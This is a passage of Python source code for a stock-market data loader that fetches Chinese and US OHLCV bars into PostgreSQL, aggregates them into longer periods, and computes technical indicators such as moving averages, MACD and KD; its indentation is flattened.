symbols_t = ','.join(stock_name_array)
stock_symbols = '{' + symbols_t + '}'
logger.debug('%s - %s' % (exchange, stock_symbols))
statement_sql = ""
create_table = ""
if DataContext.iscountryChina():
if period == 15:
create_table = "create_table_c"
elif period == 30:
create_table = "create_table_c_30"
elif period == 60:
create_table = "create_table_c_60"
elif period == 240:
create_table = "create_table_c_240"
elif DataContext.iscountryUS():
if period == 15:
create_table = "create_table_u"
elif period == 30:
create_table = "create_table_u_30"
if create_table != "":
statement_sql = "call " + create_table + "(%s,%s);"
csr.execute(statement_sql, (stock_symbols, exchange))
conn.commit()
def droptable(symbols: list, exchange: str):
conn = getdbconn()
csr = getdbconn().cursor()
stock_name_df_array = map(str, symbols)
symbols_t = ','.join(stock_name_df_array)
stock_symbols = '{' + symbols_t + '}'
logger.debug('%s - %s' % (exchange, stock_symbols))
csr.execute("call drop_table_c(%s,%s);", (stock_symbols, exchange))
conn.commit()
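# ON CONFLICT tails appended to the INSERT statements below: update_stat
# overwrites an existing bar with the freshly fetched OHLCV values, while
# do_nothing leaves it untouched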
update_stat = " do update set open=excluded.open,close=excluded.close,high=excluded.high,low=excluded.low,volume=excluded.volume;"
do_nothing = " do nothing;"
def inserttab(exchange: str, symbol: str, stock_df: pd.DataFrame, datasource: DataSource, period=15, transientdf: pd.DataFrame=None, type_func=1):
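    """Upsert OHLCV bars for `symbol` into the per-board tables.

    Column headers are mapped per data source; 15-minute bars are written
    directly, pairs of 15-minute bars are merged into 30-minute bars and,
    for China, pairs of 30-minute bars into 60-minute bars and eight
    30-minute bars into one 240-minute (day) bar.
    """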
conn = getdbconn()
csr = getdbconn().cursor()
if DataContext.iscountryChina():
if datasource == DataSource.AK_SHARE:
stock_day = stock_df['day'].tolist()
header_o = 'open'
header_c = 'close'
header_h = 'high'
header_l = 'low'
header_v = 'volume'
elif datasource == DataSource.SNAPSHOT:
stock_day = stock_df.index.tolist()
header_o = 'open'
header_c = 'close'
header_h = 'high'
header_l = 'low'
header_v = 'volume'
elif datasource == DataSource.EAST_MONEY:
header_o = 'OPEN'
header_c = 'CLOSE'
header_h = 'HIGH'
header_l = 'LOW'
header_v = 'VOLUME'
if type_func == 1:
stock_day = stock_df.index.tolist()
elif type_func == 2:
header_d = 'DATES'
elif datasource == DataSource.EFINANCE:
stock_day = stock_df['日期'].tolist()
header_o = '开盘'
header_c = '收盘'
header_h = '最高'
header_l = '最低'
header_v = '成交量'
statement_start = "insert into china_"
elif DataContext.iscountryUS():
if datasource == DataSource.YAHOO:
stock_day = stock_df.index.tolist()
header_o = 'Open'
header_c = 'Close'
header_h = 'High'
header_l = 'Low'
header_v = 'Volume'
statement_start = "insert into us_"
stock_open = stock_df[header_o]
stock_close = stock_df[header_c]
stock_high = stock_df[header_h]
stock_low = stock_df[header_l]
stock_volume = list(map(int, stock_df[header_v].tolist()))
if period == 15:
count: int = 0
for each_time in stock_day:
if DataContext.iscountryUS():
csr.execute(statement_start + exchange + "_tbl (gid,crt_time,open,close,high,low,volume) " +
"values (%s,%s,%s,%s,%s,%s,%s) on conflict on constraint time_key_" + exchange + update_stat,
(str(symbol), str(each_time), "{:.4f}".format(stock_open[count]), "{:.4f}".format(stock_close[count]),
"{:.4f}".format(stock_high[count]), "{:.4f}".format(stock_low[count]), str(stock_volume[count])))
elif DataContext.iscountryChina():
csr.execute(statement_start + exchange + "_tbl (gid,crt_time,open,close,high,low,volume) " +
"values (%s,%s,%s,%s,%s,%s,%s) on conflict on constraint time_key_" + exchange + update_stat,
(str(symbol), str(each_time), str(stock_open[count]), str(stock_close[count]),
str(stock_high[count]), str(stock_low[count]), str(stock_volume[count])))
count += 1
conn.commit()
logger.debug("%s - rows are %d for period 15 mins" % (symbol, count))
elif period == 30:
count: int = 0
i: int = 0
loop_len = len(stock_day) - 1
while i < loop_len:
timestamp: pd.Timestamp = pd.to_datetime(stock_day[i])
time_point = datetime.datetime(year=timestamp.year, month=timestamp.month, day=timestamp.day,
hour=timestamp.hour, minute=timestamp.minute, second=timestamp.second)
open_time = datetime.datetime.combine(datetime.date(year=timestamp.year, month=timestamp.month, day=timestamp.day),
DataContext.marketopentime)
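            # count_period is the number of completed 15-minute slots since the
            # open; a leading bar on an even slot is skipped so every merged
            # (i, i + 1) pair closes on a 30-minute boundary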
count_period = (time_point - open_time).seconds // (15 * 60)
if i == 0 and (count_period % 2) == 0:
i += 1
continue
next_idx = i + 1
open_value = stock_open[i]
close_value = stock_close[next_idx]
if stock_high[i] >= stock_high[next_idx]:
high_value = stock_high[i]
else:
high_value = stock_high[next_idx]
if stock_low[i] <= stock_low[next_idx]:
low_value = stock_low[i]
else:
low_value = stock_low[next_idx]
volume_value = stock_volume[i] + stock_volume[next_idx]
i += 2
if DataContext.iscountryUS():
csr.execute(statement_start + exchange + "_tbl_30 (gid,crt_time,open,close,high,low,volume) " +
"values (%s,%s,%s,%s,%s,%s,%s) on conflict on constraint time_key_" + exchange + "_30" + update_stat,
(str(symbol), str(stock_day[next_idx]), "{:.4f}".format(open_value), "{:.4f}".format(close_value),
"{:.4f}".format(high_value), "{:.4f}".format(low_value), str(volume_value)))
elif DataContext.iscountryChina():
csr.execute(statement_start + exchange + "_tbl_30 (gid,crt_time,open,close,high,low,volume) " +
"values (%s,%s,%s,%s,%s,%s,%s) on conflict on constraint time_key_" + exchange + "_30" + update_stat,
(str(symbol), str(stock_day[next_idx]), str(open_value), str(close_value),
str(high_value), str(low_value), str(volume_value)))
transientdf.loc[len(transientdf)] = [str(symbol), open_value, close_value, high_value, low_value,
str(volume_value), stock_day[next_idx], nan]
count += 1
if transientdf is not None:
transientdf.set_index('time', inplace=True)
conn.commit()
logger.debug("%s - rows are %d for period 30 mins" % (symbol, count))
elif period == 60 and DataContext.iscountryChina():
count: int = 0
transientdf.sort_index(inplace=True)
stock_day = transientdf.index.tolist()
stock_open = transientdf['open']
stock_close = transientdf['close']
stock_high = transientdf['high']
stock_low = transientdf['low']
stock_volume = list(map(int, transientdf['volume'].tolist()))
i: int = 0
loop_len = len(stock_day) - 1
while i < loop_len:
next_idx = i + 1
open_value = stock_open[i]
close_value = stock_close[next_idx]
if stock_high[i] >= stock_high[next_idx]:
high_value = stock_high[i]
else:
high_value = stock_high[next_idx]
if stock_low[i] <= stock_low[next_idx]:
low_value = stock_low[i]
else:
low_value = stock_low[next_idx]
volume_value = stock_volume[i] + stock_volume[next_idx]
i += 2
csr.execute(statement_start + exchange + "_tbl_60 (gid,crt_time,open,close,high,low,volume) " +
"values (%s,%s,%s,%s,%s,%s,%s) on conflict on constraint time_key_" + exchange + "_60" + update_stat,
(str(symbol), str(stock_day[next_idx]), str(open_value), str(close_value),
str(high_value), str(low_value), str(volume_value)))
count += 1
conn.commit()
logger.debug("%s - rows are %d for period 60 mins" % (symbol, count))
elif period == 240 and DataContext.iscountryChina():
count: int = 0
if type_func == 2:
for code, row in stock_df.iterrows():
if row[header_o] is not None and \
row[header_c] is not None and \
row[header_h] is not None and \
row[header_l] is not None and \
row[header_v] is not None and \
len(code.split('.')) > 1:
csr.execute(statement_start + exchange + "_tbl_240 (gid,crt_time,open,close,high,low,volume) " +
"values (%s,%s,%s,%s,%s,%s,%s) on conflict on constraint time_key_" + exchange + "_240" + update_stat,
(str(code.split('.')[0]), str(row[header_d]), str(row[header_o]), str(row[header_c]),
str(row[header_h]), str(row[header_l]), str(row[header_v])))
count += 1
else:
transientdf.sort_index(inplace=True)
stock_day = transientdf.index.tolist()
stock_open = transientdf['open']
stock_close = transientdf['close']
stock_high = transientdf['high']
stock_low = transientdf['low']
stock_volume = list(map(int, transientdf['volume'].tolist()))
i: int = 0
stock_day_len = len(stock_day)
            # transientdf holds 30-minute bars; eight of them make one
            # 240-minute (full trading day) bar, so skip any leading
            # remainder bars that cannot fill a whole day
            abandoned_30_mins_count = stock_day_len % 8
            if abandoned_30_mins_count != 0:
                i += abandoned_30_mins_count
while i < stock_day_len:
last_index = i + 7
if last_index > stock_day_len - 1:
break
timestamp: pd.Timestamp = pd.to_datetime(stock_day[i])
time_point = datetime.datetime(year=timestamp.year, month=timestamp.month, day=timestamp.day)
open_value = stock_open[i]
close_value = stock_close[last_index]
high_value = float(stock_high[i])
low_value = float(stock_low[i])
volume_value = stock_volume[i]
i += 1
while i < last_index + 1:
if float(stock_high[i]) > high_value:
high_value = float(stock_high[i])
if float(stock_low[i]) < low_value:
low_value = float(stock_low[i])
volume_value += stock_volume[i]
i += 1
csr.execute(statement_start + exchange + "_tbl_240 (gid,crt_time,open,close,high,low,volume) " +
"values (%s,%s,%s,%s,%s,%s,%s) on conflict on constraint time_key_" + exchange + "_240" + update_stat,
(str(symbol), str(time_point), str(open_value), str(close_value),
str(high_value), str(low_value), str(volume_value)))
count += 1
if count != 0:
conn.commit()
logger.debug("%s - rows are %d for period 240 mins" % (exchange, count))
pbar = tqdm()
def insertdata(exchange: str, group: str, symbols: list, retried, datasource: DataSource, period: str = '15',
type_func=1, context: DataContext=None, adjust: str = "qfq"):
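    """Download bars for each symbol from `datasource` and upsert them.

    type_func selects the fetch path: 1 pulls recent history per symbol
    (AKShare / EM / efinance), 5 replays the last 16 bars already held in
    `context`, and 2 is the deprecated EM daily bulk path.
    """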
exchange_group = ",".join([exchange, group])
def update_database(exchange_in: str, symbol_s: str, dataset, source):
inserttab(exchange_in, symbol_s, dataset, source)
tmp_df = pd.DataFrame(columns=columns)
inserttab(exchange_in, symbol_s, dataset, source, period=30, transientdf=tmp_df)
inserttab(exchange_in, symbol_s, dataset, source, period=60, transientdf=tmp_df)
inserttab(exchange_in, symbol_s, dataset, source, period=240, transientdf=tmp_df)
if DataContext.iscountryChina():
evt = threading.Event()
if type_func == 1:
global pbar
pbar.total = len(symbols)
pbar.set_description_str(f'{exchange} Processing')
for symbol_i in symbols:
if datasource == DataSource.AK_SHARE:
symbol_internal = group + str(symbol_i)
# stock_zh_df_tmp = ak.stock_zh_a_minute(symbol=symbol_internal, period=period, adjust=adjust)
# FIXME
try:
time.sleep(1)
stock_zh_df_tmp = ak.stock_zh_a_minute(symbol=symbol_internal, period=period, datalengh="16")
except:
stock_zh_df_tmp = pd.DataFrame(columns=columns)
failed_to_get_data_symbols.append((group, str(symbol_i)))
logger.error("it is failed to get stock data for {}".format(symbol_internal))
elif datasource == DataSource.EAST_MONEY:
symbol_internal = ".".join([str(symbol_i), group])
stock_zh_df_tmp = c.cmc(symbol_internal, "OPEN,HIGH,LOW,CLOSE,VOLUME,TIME",
(datetime.datetime.today() - datetime.timedelta(days=3)).strftime(
"%Y-%m-%d"),
datetime.datetime.today().strftime("%Y-%m-%d"),
"AdjustFlag=1,RowIndex=2,Period=15,IsHistory=1,Ispandas=1")
if isinstance(stock_zh_df_tmp, c.EmQuantData) and stock_zh_df_tmp.ErrorCode != 0:
                        logger.error(
                            "failed to get stock data for {} {}; error code {}, error message {}".
                            format(symbol_i, exchange_group, stock_zh_df_tmp.ErrorCode, stock_zh_df_tmp.ErrorMsg))
if stock_zh_df_tmp.ErrorMsg.find('service error') != -1 or \
stock_zh_df_tmp.ErrorCode == 10002011 or \
stock_zh_df_tmp.ErrorCode == 10002010 or \
stock_zh_df_tmp.ErrorCode == 10002004:
append_value(retried, exchange_group, symbol_i)
elif datasource == DataSource.EFINANCE:
freq = 15
stock_zh_df_tmp: pd.DataFrame = ef.stock.get_quote_history(
str(symbol_i), klt=freq,
beg=(datetime.datetime.today() - datetime.timedelta(days=0)).strftime("%Y%m%d"),
end=(datetime.datetime.today() - datetime.timedelta(days=0)).strftime("%Y%m%d"),
fqt=0)
if isinstance(stock_zh_df_tmp, pd.DataFrame) and len(stock_zh_df_tmp) > 0:
update_database(exchange, symbol_i, stock_zh_df_tmp, datasource)
if datasource == DataSource.AK_SHARE:
# watchdog for fetching stock data
global queue_history_data
queue_history_data.put(((group, str(symbol_i)), evt))
evt.wait()
pbar.update(1)
pbar.set_description_str(f'{exchange} Processing => {symbol_i}')
elif type_func == 5:
for symbol_i in symbols:
dataframe_context: pd.DataFrame = context.data15mins[exchange].get(symbol_i)
df_today = pd.DataFrame(columns=['gid', 'open', 'close', 'high', 'low', 'volume'])
index_list = dataframe_context.index.tolist()
total_len = 16
i = - total_len
while i < 0:
row = dataframe_context.iloc[i]
df_today.loc[index_list[i]] = [str(symbol_i), row['open'], row['close'],
row['high'], row['low'], row['volume']]
i += 1
update_database(exchange, symbol_i, df_today, datasource)
        # EM has been deprecated.
elif type_func == 2:
symbol_internals = []
for symbol_i in symbols:
symbol_internals.append(".".join([str(symbol_i), group]))
if group == "SZ":
market = "CNSESZ"
else:
market = "CNSESH"
stock_zh_df_tmp = c.csd(symbol_internals, "OPEN,HIGH,LOW,CLOSE,VOLUME,TIME",
(datetime.datetime.today() - datetime.timedelta(days=3)).strftime("%Y-%m-%d"),
datetime.datetime.today().strftime("%Y-%m-%d"),
"AdjustFlag=1,RowIndex=1,Period=1,Ispandas=1,Market=%s" % market)
if isinstance(stock_zh_df_tmp, c.EmQuantData) and stock_zh_df_tmp.ErrorCode != 0:
                logger.error(
                    "failed to get stock data for {}; error code {}, error message {}".
                    format(exchange_group, stock_zh_df_tmp.ErrorCode, stock_zh_df_tmp.ErrorMsg))
elif isinstance(stock_zh_df_tmp, pd.DataFrame):
inserttab(exchange, "", stock_zh_df_tmp, datasource, period=240, type_func=type_func)
elif DataContext.iscountryUS():
for symbol_i in symbols:
stock_us_df_tmp = yf.download(tickers=symbol_i, auto_adjust=True, period="10d", interval="15m")
if isinstance(stock_us_df_tmp, pd.DataFrame):
inserttab(exchange, symbol_i, stock_us_df_tmp, datasource)
inserttab(exchange, symbol_i, stock_us_df_tmp, datasource, period=30)
def insertdata_continue(exchange: str, group: str, symbols: list, c_point: str, retried, datasource: DataSource,
period: str = '15', type_func=1, adjust: str = "qfq"):
pos = (pd.Series(symbols) == c_point).argmax() + 1
insertdata(exchange, group, symbols[pos:], retried, datasource, period, type_func)
def insertdata_with_snapshot(exchange:str, group:str, symbols:list, context: DataContext, datasource: DataSource):
insertdata(exchange, group, symbols, {}, datasource, type_func=5, context=context)
def loaddatalocked(indicator: str, exchange: str, symbols: list, operation: int, type_func=1,
                   datasource=DataSource.AK_SHARE, c_point='', retried=None, period=15,
                   context: DataContext=None):
    if retried is None:  # avoid sharing a mutable default dict across calls
        retried = {}
    group = stock_group[indicator]
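    # note the naming: `exchange` carries the code returned by selectgroup
    # ('SZ'/'SH'/'O'/...), while `group` is the board key used in table
    # names, so insertdata below receives (exchange=board key, group=code)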
if operation == 1:
createtable(symbols, group, period)
elif operation == 2:
insertdata(group, exchange, symbols, retried, datasource, "%d" % period, type_func)
elif operation == 3:
insertdata_continue(group, exchange, symbols, c_point, retried, datasource, "%d" % period, type_func)
elif operation == 4:
droptable(symbols, group)
elif operation == 5:
insertdata_with_snapshot(group, exchange, symbols, context, datasource)
def normalizeticker(symbols: pd.Series) -> pd.Series:
    # zero-pad every ticker to the 6-digit CN format; tickers that are
    # already 6 characters long pass through unchanged
    symbols_dict = {}
    for dict_count, ticker in enumerate(symbols):
        symbols_dict[dict_count] = str(ticker).zfill(6)
    return pd.Series(symbols_dict)
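# e.g. normalizeticker(pd.Series([1, 600519])) -> pd.Series(["000001", "600519"])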
def selectgroup(indicator: str):
symbol_path = symbol_paths[stock_group[indicator]]
if pathlib.Path(symbol_path).is_file():
symbolsfromcsv = pd.read_csv(symbol_path)
else:
logger.error("The file {} doesn't exist".format(symbol_path))
exit()
if DataContext.iscountryChina():
if indicator in {"中小企业板", "创业板", "主板"}:
header = "公司代码"
group = 'SZ'
if indicator in {"中小企业板", "主板"}:
returndata = normalizeticker(symbolsfromcsv[header]).tolist()
else:
returndata = symbolsfromcsv[header].tolist()
if indicator in {"科创板", "主板A股"}:
header = 'SECURITY_CODE_A'
group = 'SH'
returndata = symbolsfromcsv[header].tolist()
elif DataContext.iscountryUS():
if indicator == "NASDAQ":
group = 'O'
elif indicator == "NYSE":
group = 'N'
elif indicator == "AMEX":
group = 'A'
symbol_group = symbolsfromcsv['SECURITY_CODE_A'].tolist()
returndata = [symbol_us.split('.')[0] for symbol_us in symbol_group if len(symbol_us.split('.')) > 1]
return group, returndata
def loaddata(indicators, operation: int, c_point='', datasource: DataSource = DataSource.AK_SHARE, period=15, type_func=1, isloginAlready=False):
retriedStocks = {}
if datasource == DataSource.EAST_MONEY and not isloginAlready:
login_em()
try:
loaddatainternal(indicators, operation, type_func, c_point, retriedStocks, datasource, period)
if datasource == DataSource.EAST_MONEY and type_func == 1:
reloaddata(retriedStocks)
finally:
if not isloginAlready:
if datasource == DataSource.EAST_MONEY:
logout_em()
if getdbconn():
getdbconn().cursor().close()
getdbconn().close()
logger.debug("PostgreSQL connection is closed")
def loaddatainternal(indicators, operation: int, type_func=1, c_point='', retried=None,
                     datasource: DataSource = DataSource.AK_SHARE, period=15, context: DataContext=None):
    if retried is None:  # avoid sharing a mutable default dict across calls
        retried = {}
    try:
for indicator in indicators:
logger.debug("The board data is downloaded for is {} and native thread id is {} and thread ident is {}".
format(indicator, threading.get_native_id(), threading.get_ident()))
group, symbols = selectgroup(indicator)
loaddatalocked(indicator, group, symbols, operation, type_func, datasource,
c_point, retried, period, context)
except psycopg2.Error as error:
logger.error("Error while connecting to PostgreSQL", error)
except Exception as ee:
logger.error("error >>>", ee)
traceback.print_exc()
def reloaddata(stocks, datasource: DataSource = DataSource.EAST_MONEY):
if len(stocks) == 0:
return
else:
retriedstocks = {}
logger.debug("stocks reloaded are {}".format(stocks))
for index, value in stocks.items():
idx = index.split(",")
if isinstance(value, list):
symbols = value
else:
symbols = [value]
if len(idx) > 1:
insertdata(idx[0], idx[1], symbols, retriedstocks, datasource)
logger.debug("Stocks that is still NOT downloaded are {}".format(retriedstocks))
else:
logger.debug("error occurs in idx -> {}".format(idx))
def checksymbols(*indicators: str):
logger.info("start to check if there are new stocks on market.")
for indicator in indicators:
# TODO need to use old version of function selectgroup
group_mark, symbols = selectgroup(indicator)
print(symbols)
symbol_path = symbol_paths[stock_group[indicator]]
if pathlib.Path(symbol_path).is_file():
symbolsfromcsv = pd.read_csv(symbol_path)
length_symbols = len(symbols)
diff = length_symbols - len(symbolsfromcsv)
if diff > 0:
for num in range(diff):
index = length_symbols - num - 1
print(symbols[index])
# create new partition and insert data
else:
symbols.to_csv(symbol_path, index=False)
logger.info("Checking new stocks is done.")
class ProcessStatus(enum.Enum):
STOP = 0
START = 1
# ================================================================
class ActionBase:
"""
This is a base class. All action should extend to it.
"""
def __init__(self, data: pd.DataFrame):
self._data = data
# retrieve latest close price with a given period
def close_ticker(self, period: int):
return self._data['close'][period]
# retrieve latest open price with a given period
def open_ticker(self, period: int):
return self._data['open'][period]
# retrieve latest exchange volume with a given period
def volume_ticker(self, period: int):
return self._data['volume'][period]
# retrieve latest high price with a given period
def high_ticker(self, period: int):
return self._data['high'][period]
# retrieve latest low price with a given period
def low_ticker(self, period: int):
return self._data['low'][period]
# retrieve quote with given period
def refer_ticker(self, start_index: int, period: int, fn_ticker):
index = start_index - period
return fn_ticker(index)
def getindex(self, timestamp: pd.Timestamp):
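        # scan backwards (recent bars are the common lookup) and return the
        # positional index of the matching timestamp, or None if absent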
tsi = self._data.index
length = len(tsi)
i = length - 1
while i > -1:
if tsi[i] == timestamp:
break
i -= 1
else:
i = None
return i
@abstractmethod
def executeaction(self, **kwargs):
pass
class MAAction(ActionBase):
def __init__(self, startindex: int, endindex: int, period: int, data: pd.DataFrame):
super().__init__(data)
self.__startindex = startindex
self.__endindex = endindex
self.__period = period
def __ma(self, fn_ticker):
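        # rolling simple average via a running sum: seed the window ending at
        # __endindex, then slide it one bar at a time up to __startindex,
        # emitting one average per bar (indices are negative, from the end)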
ret = {}
totalinperiod: float64 = 0
traverseback = 1 - self.__period
if (len(self._data) + self.__endindex) < (0 - traverseback) or \
self.__endindex > self.__startindex:
return False, ret
traversalindex = self.__endindex + traverseback
i = traversalindex
if self.__period > 1:
while i < self.__endindex:
totalinperiod += fn_ticker(i)
i += 1
outindex = self.__endindex
def calc():
nonlocal i, totalinperiod, traversalindex, outindex
totalinperiod += fn_ticker(i)
i += 1
tmptotal = totalinperiod
totalinperiod -= fn_ticker(traversalindex)
traversalindex += 1
ret[outindex] = tmptotal / self.__period
outindex += 1
calc()
while i <= self.__startindex:
calc()
return True, ret
def executeaction(self, **kwargs):
return self.__ma(kwargs['fn_ticker'])
class CROSSUpMAAction(ActionBase):
def __init__(self, data: pd.DataFrame):
super().__init__(data)
def __comparevalue(self, index: int, averagevalue: float64, period: int):
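        # cross-up test against the moving average: either the current bar
        # straddles it (open at/below, close at/above), or the previous close
        # was below the previous average (reconstructed as sma_pre) while the
        # current bar opens and closes above it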
distance = - period # distance should be negative
open_cur = self.open_ticker(index)
close_cur = self.close_ticker(index)
# need to consider critical
guard = len(self._data) + distance - 2
if guard < 0:
close_pre_period = close_pre = close_cur
else:
close_pre_period = self.refer_ticker(index, - distance, self.close_ticker)
close_pre = self.refer_ticker(index, 1, self.close_ticker)
sma_pre = (averagevalue * period - close_cur + close_pre_period) / period
con_1 = close_cur >= averagevalue >= open_cur
con_2 = close_pre < sma_pre and open_cur >= averagevalue and close_cur >= averagevalue
return con_1 or con_2
def executeaction(self, **kwargs):
index_s = kwargs['startindex']
index_e = kwargs['endindex']
_cross_period = kwargs['cross_period']
_greater_period = kwargs['greater_period']
ret = pd.DataFrame(columns=columns)
ma_cross = MAAction(index_s, index_e, _cross_period, self._data)
valid_cross, result_cross = ma_cross.executeaction(fn_ticker=self.close_ticker)
sma_greater = MAAction(index_s, index_e, _greater_period, self._data)
valid_greater, result_greater = sma_greater.executeaction(fn_ticker=self.volume_ticker)
if valid_cross:
for index_cross, average_cross in result_cross.items():
if self.__comparevalue(index_cross, average_cross, _cross_period):
row = self._data.loc[self._data.index[index_cross]]
ret.loc[len(ret)] = [row['gid'], row['open'], row['close'],
row['high'], row['low'], row['volume'],
row.name, False]
if valid_greater and \
index_cross in result_greater and \
self.volume_ticker(index_cross) > result_greater[index_cross]:
ret.loc[ret.index[-1]] = [row['gid'], row['open'], row['close'],
row['high'], row['low'], row['volume'],
row.name, True]
return True, ret
else:
return False, ret
class XMAAction(ActionBase):
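    """Recursive weighted smoother: v[i] = weight * (x[i] - v[i-1]) + v[i-1],
    seeded with `intvalue` at index `minlength - 1`. With weight = 2 / (n + 1)
    it acts as an EMA (see MACDAction); with weight = 1 / n it is the
    SMA-style smoothing used by KDAction.
    """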
def __init__(self, data: pd.DataFrame):
super().__init__(data)
def executeaction(self, **kwargs):
def calc_xma(index):
if index < minlength - 1:
logger.error("length of data must be greater than {} for {} in {}}".
format(minlength, reason, operationtype))
return False, values
valid_r, value_r = target(index)
intret = False
if valid_r:
if index == minlength - 1:
values[index] = weight * (value_r - intvalue) + intvalue
intret = True
else:
index_p = index - 1
intret = calc_xma(index_p)
if intret:
values[index] = weight * (value_r - values[index_p]) + values[index_p]
return valid_r and intret
minlength = kwargs['minlength']
target = kwargs['fnf']
weight = kwargs['weight']
intvalue = kwargs['intvalue']
reason = kwargs.get('reason', "")
operationtype = kwargs.get('operationtype', "")
values = [None for i in range(len(self._data.index))]
ret_v = calc_xma(len(self._data.index) - 1)
return ret_v, values
class MACDAction(ActionBase):
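    """Classic MACD: DIF = EMA(close, short) - EMA(close, long) and
    DEA = EMA(DIF, m); executeaction returns (valid, dif_values, dea_values).
    """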
def __init__(self, data: pd.DataFrame, short_period, long_period, m_period):
super().__init__(data)
self.__short_period = short_period
self.__long_period = long_period
self.__m_period = m_period
self.__data_length = len(self._data.index)
self.__min_length = 1
self.__dif_long_v = [None for i in range(self.__data_length)]
self.__dif_short_v = [None for i in range(self.__data_length)]
self.__dif_v = [None for i in range(self.__data_length)]
self.__dea_v = [None for i in range(self.__data_length)]
self.__xma = XMAAction(data)
def __getCloseTicker(self, index):
valid = False
ret = None
if index < self.__min_length - 1:
logger.error("index is invalid in data for MACD", index)
else:
ret = self.close_ticker(index)
if ret is not None:
valid = True
return valid, ret
def __getdifvalue(self, index):
valid = False
ret = None
if index < self.__min_length - 1:
logger.error("index is invalid in data for MACD", index)
else:
ret = self.__dif_v[index]
if ret is not None:
valid = True
return valid, ret
def executeaction(self, **kwargs):
ret_v, self.__dif_long_v = self.__xma.executeaction(minlength=self.__min_length,
fnf=self.__getCloseTicker,
weight=2 / (self.__long_period + 1),
intvalue=0,
reason='MACD_dif_long',
operationtype='EMA')
if ret_v:
ret_v, self.__dif_short_v = self.__xma.executeaction(minlength=self.__min_length,
fnf=self.__getCloseTicker,
weight=2 / (self.__short_period + 1),
intvalue=0,
reason='MACD_dif_short',
operationtype='EMA')
if ret_v:
index = 0
while index < self.__data_length:
if self.__dif_short_v[index] is not None and self.__dif_long_v[index] is not None:
self.__dif_v[index] = self.__dif_short_v[index] - self.__dif_long_v[index]
index += 1
ret_v, self.__dea_v = self.__xma.executeaction(minlength=self.__min_length,
fnf=self.__getdifvalue,
weight=2 / (self.__m_period + 1),
intvalue=0,
reason='MACD_dea',
operationtype='EMA')
return ret_v, self.__dif_v, self.__dea_v
class StrategyBasedonMACDAction(ActionBase):
def __init__(self, data: pd.DataFrame, period, short_period=12, long_period=26, m_period=9):
super().__init__(data)
self.__period = period
self.__macd = MACDAction(data, short_period, long_period, m_period)
self.__ret_v, self.__dif_v, self.__dea_v = self.__macd.executeaction()
def executeaction(self, **kwargs):
operation = kwargs.get('operation', '')
ret_valid = False
ret_valid_int = True
ret_value = pd.DataFrame(columns=columns)
data_length = len(self._data.index)
if self.__ret_v and data_length >= self.__period:
ret_valid = True
if operation == 'strict':
count = 0
cursor = data_length - 1
while count < self.__period:
dif_c = self.__dif_v[cursor]
dea_c = self.__dea_v[cursor]
if dif_c is None or dea_c is None:
ret_valid = False
ret_valid_int = False
break
else:
if dif_c > dea_c:
if count < self.__period - 1:
dif_p = self.__dif_v[cursor - 1]
dea_p = self.__dea_v[cursor - 1]
if dif_p is None or dea_p is None:
ret_valid = False
ret_valid_int = False
break
elif dif_c <= dif_p or dea_c <= dea_p:
ret_valid_int = False
break
else:
ret_valid_int = False
break
count += 1
cursor -= 1
elif operation == 'dif':
count = 0
cursor = data_length - 1
while count < self.__period:
dif_c = self.__dif_v[cursor]
if dif_c is None:
ret_valid = False
ret_valid_int = False
break
else:
if count < self.__period - 1:
dif_p = self.__dif_v[cursor - 1]
if dif_p is None:
ret_valid = False
ret_valid_int = False
break
elif dif_c <= dif_p:
ret_valid_int = False
break
count += 1
cursor -= 1
elif operation == 'cross_up':
try:
diff, dea, macd = MACD(self._data.close.values)
tmp_ret = CROSS(diff, dea)
if tmp_ret[-2] or not tmp_ret[-1]:
ret_valid_int = False
except BaseException as be:
logger.error("MACD is failed", be)
ret_valid = False
ret_valid_int = False
else:
ret_valid = False
ret_valid_int = False
logger.error("operation is not suppored by MACDGOUP", operation)
if ret_valid_int:
time_stamp = self._data.index[-1]
row = self._data.loc[time_stamp]
ret_value.loc[len(ret_value)] = [row['gid'], row['open'], row['close'],
row['high'], row['low'], row['volume'],
time_stamp, True]
return ret_valid, ret_value
class LLVAction(ActionBase):
def __init__(self, data: pd.DataFrame, rsv_period):
super().__init__(data)
self.__period = rsv_period
def executeaction(self, **kwargs):
ret_value = 0
function = kwargs['fn_ticker']
index = kwargs['index_c']
if index - (self.__period - 1) < 0:
return False, ret_value
for i in range(self.__period):
index_internal = index - i
price = function(index_internal)
if i == 0:
ret_value = price
elif price < ret_value:
ret_value = price
return True, ret_value
class HHVAction(ActionBase):
def __init__(self, data: pd.DataFrame, rsv_period):
super().__init__(data)
self.__period = rsv_period
def executeaction(self, **kwargs):
ret_value = 0
function = kwargs['fn_ticker']
index = kwargs['index_c']
if index - (self.__period - 1) < 0:
return False, ret_value
for i in range(self.__period):
index_internal = index - i
price = function(index_internal)
if i == 0:
ret_value = price
elif price > ret_value:
ret_value = price
return True, ret_value
class KDAction(ActionBase):
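    """Stochastic K/D lines: RSV smoothed twice by XMAAction with SMA-style
    weights 1 / k_period and 1 / d_period.
    """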
def __init__(self, data: pd.DataFrame, rsvperiod, kperiod, dperiod):
super().__init__(data)
self.__rsv_period = rsvperiod
self.__k_period = kperiod
self.__d_period = dperiod
self.__llvaction = LLVAction(self._data, self.__rsv_period)
self.__hhvaction = HHVAction(self._data, self.__rsv_period)
self.__k_v = [None for i in range(len(self._data.index))]
self.__d_v = [None for i in range(len(self._data.index))]
self.__xma = XMAAction(data)
def __rsv(self, index):
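        # RSV: position of the close within the high/low range of the last
        # `rsv_period` bars, scaled to 0..100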
ret = 0
valid1, result_llv = self.__llvaction.executeaction(fn_ticker=self.low_ticker, index_c=index)
if not valid1:
return valid1, ret
valid2, result_hhv = self.__hhvaction.executeaction(fn_ticker=self.high_ticker, index_c=index)
if not valid2:
return valid2, ret
        range_v = result_hhv - result_llv
        if range_v == 0:
            # flat high/low window (e.g. a limit-locked stock): RSV is undefined
            return False, ret
        ret = (self.close_ticker(index) - result_llv) / range_v * 100
        return True, ret
def __kvalue(self, index):
valid = False
ret = None
if index < self.__rsv_period - 1 or index >= len(self.__k_v):
logger.error("index is invalid in kvalue", index)
else:
ret = self.__k_v[index]
if ret is not None:
valid = True
return valid, ret
'''
def sma(self, fnf, n, m, index, values):
if index < self.__rsv_period - 1:
logger.error("index must be greater than %d for KD in sma", self.__rsv_period - 1)
return False
valid_r, value_r = fnf(index)
k_t_v = False
if valid_r:
if index == self.__rsv_period - 1:
values[index] = (value_r*m + 50*(n-m))/n
k_t_v = True
else:
index_p = index - 1
k_t_v = self.sma(fnf, n, m, index_p, values)
if k_t_v:
values[index] = (value_r*m + values[index_p]*(n-m))/n
return valid_r and k_t_v
'''
def executeaction(self, **kwargs):
